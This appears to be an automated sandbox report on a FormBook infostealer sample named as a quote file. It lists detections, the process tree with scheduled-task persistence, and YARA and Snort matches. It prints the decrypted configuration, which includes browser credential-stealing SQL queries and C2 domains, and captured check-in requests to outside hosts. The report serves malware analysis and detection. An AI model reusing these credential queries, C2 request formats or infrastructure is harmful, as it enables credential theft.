Loading ...

Play interactive tourEdit tour

Analysis Report quote20210126.exe.bin

Overview

General Information

Sample Name:quote20210126.exe.bin (renamed file extension from bin to exe)
Analysis ID:344748
MD5:1685762eb9eb252f560a5e7a33f78ef1
SHA1:8069ef4b521b80772e3af6d7e5fd162f824d2c96
SHA256:33c5a410d6ac03a18a033a6162b958efec61a9ab0caf991ecf6bc3a7d0ae0528

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • quote20210126.exe.exe (PID: 244 cmdline: 'C:\Users\user\Desktop\quote20210126.exe.exe' MD5: 1685762EB9EB252F560A5E7A33F78EF1)
    • schtasks.exe (PID: 6896 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\nVnzZjnYhVWWZd' /XML 'C:\Users\user\AppData\Local\Temp\tmpC686.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • quote20210126.exe.exe (PID: 7004 cmdline: C:\Users\user\Desktop\quote20210126.exe.exe MD5: 1685762EB9EB252F560A5E7A33F78EF1)
    • quote20210126.exe.exe (PID: 7008 cmdline: C:\Users\user\Desktop\quote20210126.exe.exe MD5: 1685762EB9EB252F560A5E7A33F78EF1)
    • quote20210126.exe.exe (PID: 6976 cmdline: C:\Users\user\Desktop\quote20210126.exe.exe MD5: 1685762EB9EB252F560A5E7A33F78EF1)
    • quote20210126.exe.exe (PID: 6972 cmdline: C:\Users\user\Desktop\quote20210126.exe.exe MD5: 1685762EB9EB252F560A5E7A33F78EF1)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autoconv.exe (PID: 6832 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
        • systray.exe (PID: 6184 cmdline: C:\Windows\SysWOW64\systray.exe MD5: 1373D481BE4C8A6E5F5030D2FB0A0C68)
          • cmd.exe (PID: 7060 cmdline: /c del 'C:\Users\user\Desktop\quote20210126.exe.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x8bbd", "KEY1_OFFSET 0x1d70e", "CONFIG SIZE : 0xbb", "CONFIG OFFSET 0x1d807", "URL SIZE : 23", "searching string pattern", "strings_offset 0x1c363", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xd68e3618", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70b3", "0x9f715022", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121d2", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd014c5", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04", "0x50c2a508", "0x3e88e8bf", "0x4b6374a6", "0x72a93198", "0x85426977", "0xea193e11", "0xea653007", "0xe297c9c", "0x65399e87", "0x23609e75", "0xb92e8a5a", "0xabc89476", "0xd989572f", "0x4536ab86", "0x3476afc1", "0xaf24a63b", "0x393b9ac8", "0x414a3c70", "0x487e77f4", "0xbee1bdf6", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "studiomullerphoto.com", "reallionairewear.com", "dogsalondoggy-tail.com", "excelmache.net", "bigdiscounters.com", "7986799.com", "ignition.guru", "xiaoxu.info", "jpinpd.com", "solpool.info", "uchooswrewards.com", "everestengineeringworks.com", "qianglongzhipin.com", "deepimper-325.com", "appliedrate.com", "radsazemehr.com", "vivabematividadesfisicas.com", "capacitalo.com", "somecore.com", "listingclass.net", "romel.codes", "mybettermentor.com", "hxc43.com", "btccvil312723.com", "rudiskenya.com", "internationalrockmusic.com", "wudiwifi.com", "scienceacademyraj.com", "tumulusinnovations.com", "studioeduardobeninca.com", "formabench.com", "ribbonredwhiteandblue.com", "miningequipmentrental.com", "myamom.com", "riversportswear.net", "14505glenmarkdr.com", "nikolcosmetic.com", "toninopr.com", "cutfortheconnect.com", "nl22584.com", "mezokovesd.com", "rozhandesign.com", "futbolki.space", "rmobipanoshop.com", "merchmuslim.com", "recurrentcornealerosion.com", "enottampan.com", "vasquez.photos", "koreanmindbeauty.com", "andressabode.com", "thetwolouises.com", "weberbyroble.com", "followmargpolo.com", "englishclubb.online", "sorryididnthearthat.com", "greatlookfashion.club", "cartoleriagrillocatania.com", "esteprize.com", "sdsej.com", "phiecraft.xyz", "psm-gen.com", "passivefiresafe.com", "homeyplantycosy.com", "0343888.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.merckcbd.com/dei5/\u0000"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.701320257.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000006.00000002.701320257.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000006.00000002.701320257.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    0000000D.00000002.2092044926.0000000000750000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000D.00000002.2092044926.0000000000750000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 22 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      6.2.quote20210126.exe.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        6.2.quote20210126.exe.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        6.2.quote20210126.exe.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18409:$sqlite3step: 68 34 1C 7B E1
        • 0x1851c:$sqlite3step: 68 34 1C 7B E1
        • 0x18438:$sqlite3text: 68 38 2A 90 C5
        • 0x1855d:$sqlite3text: 68 38 2A 90 C5
        • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
        6.2.quote20210126.exe.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          6.2.quote20210126.exe.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a6e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b6ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Scheduled temp file as task from temp locationShow sources
          Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\nVnzZjnYhVWWZd' /XML 'C:\Users\user\AppData\Local\Temp\tmpC686.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\nVnzZjnYhVWWZd' /XML 'C:\Users\user\AppData\Local\Temp\tmpC686.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\quote20210126.exe.exe' , ParentImage: C:\Users\user\Desktop\quote20210126.exe.exe, ParentProcessId: 244, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\nVnzZjnYhVWWZd' /XML 'C:\Users\user\AppData\Local\Temp\tmpC686.tmp', ProcessId: 6896

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 6.2.quote20210126.exe.exe.400000.0.unpackMalware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x8bbd", "KEY1_OFFSET 0x1d70e", "CONFIG SIZE : 0xbb", "CONFIG OFFSET 0x1d807", "URL SIZE : 23", "searching string pattern", "strings_offset 0x1c363", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xd68e3618", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70b3", "0x9f715022", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121d2", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd014c5", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04",
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\nVnzZjnYhVWWZd.exeReversingLabs: Detection: 15%
          Multi AV Scanner detection for submitted fileShow sources
          Source: quote20210126.exe.exeReversingLabs: Detection: 15%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.701320257.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.2092044926.0000000000750000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.663461491.0000000003F39000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.702172131.0000000001370000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.663915045.00000000041FE000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.702000441.0000000000F10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.2093805951.0000000002C00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.2093723727.00000000029D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 6.2.quote20210126.exe.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.quote20210126.exe.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\nVnzZjnYhVWWZd.exeJoe Sandbox ML: detected
          Machine Learning detection for sampleShow sources
          Source: quote20210126.exe.exeJoe Sandbox ML: detected
          Source: 6.2.quote20210126.exe.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Compliance:

          barindex
          Uses 32bit PE filesShow sources
          Source: quote20210126.exe.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
          Source: quote20210126.exe.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Binary contains paths to debug symbolsShow sources
          Source: Binary string: systray.pdb source: quote20210126.exe.exe, 00000006.00000002.702234738.00000000013A0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000009.00000000.677988350.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: systray.pdbGCTL source: quote20210126.exe.exe, 00000006.00000002.702234738.00000000013A0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: quote20210126.exe.exe, 00000006.00000002.702734958.00000000014CF000.00000040.00000001.sdmp, systray.exe, 0000000D.00000002.2095102006.00000000049FF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: quote20210126.exe.exe, 00000006.00000002.702734958.00000000014CF000.00000040.00000001.sdmp, systray.exe, 0000000D.00000002.2095102006.00000000049FF000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000009.00000000.677988350.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\quote20210126.exe.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\user\Desktop\quote20210126.exe.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\user\Desktop\quote20210126.exe.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\user\Desktop\quote20210126.exe.exeCode function: 4x nop then pop esi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49761 -> 198.49.23.144:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49761 -> 198.49.23.144:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49761 -> 198.49.23.144:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 70.40.220.182:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 70.40.220.182:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 70.40.220.182:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49769 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49769 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49769 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49781 -> 198.49.23.144:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49781 -> 198.49.23.144:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49781 -> 198.49.23.144:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49783 -> 70.40.220.182:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49783 -> 70.40.220.182:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49783 -> 70.40.220.182:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49788 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49788 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49788 -> 34.102.136.180:80
          Source: global trafficHTTP traffic detected: GET /dei5/?TZkpkdJ=KZO0q/dA9tPcHL9GuJx/PgJRYyF7j38H/T1IXfK19NQMGL7UiVuEHiPF3LE2pNg/QeAw&U4kp=NtxLpLUP-vTH68s HTTP/1.1Host: www.formabench.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dei5/?TZkpkdJ=5dK4zS2spH1MRMIlKAKtRXrQS2V8a1emNoyev4a2A9Q6Oz7gRNAUWdiVyhvoRIofoFad&U4kp=NtxLpLUP-vTH68s HTTP/1.1Host: www.recurrentcornealerosion.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dei5/?TZkpkdJ=upQHmHMv4mc+L1U62DbKpSKW5TdFY7AgwVisO4oDb8strNsH+0I7Qox99h9xeSU/sZUm&U4kp=NtxLpLUP-vTH68s HTTP/1.1Host: www.vivabematividadesfisicas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dei5/?TZkpkdJ=aPqrKkv+hSGfZh5BV8qiKF80dMng48q04hmXvL44OtWxx7jRvmKAF8lSdeM/uGAiUXT3&U4kp=NtxLpLUP-vTH68s HTTP/1.1Host: www.deepimper-325.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
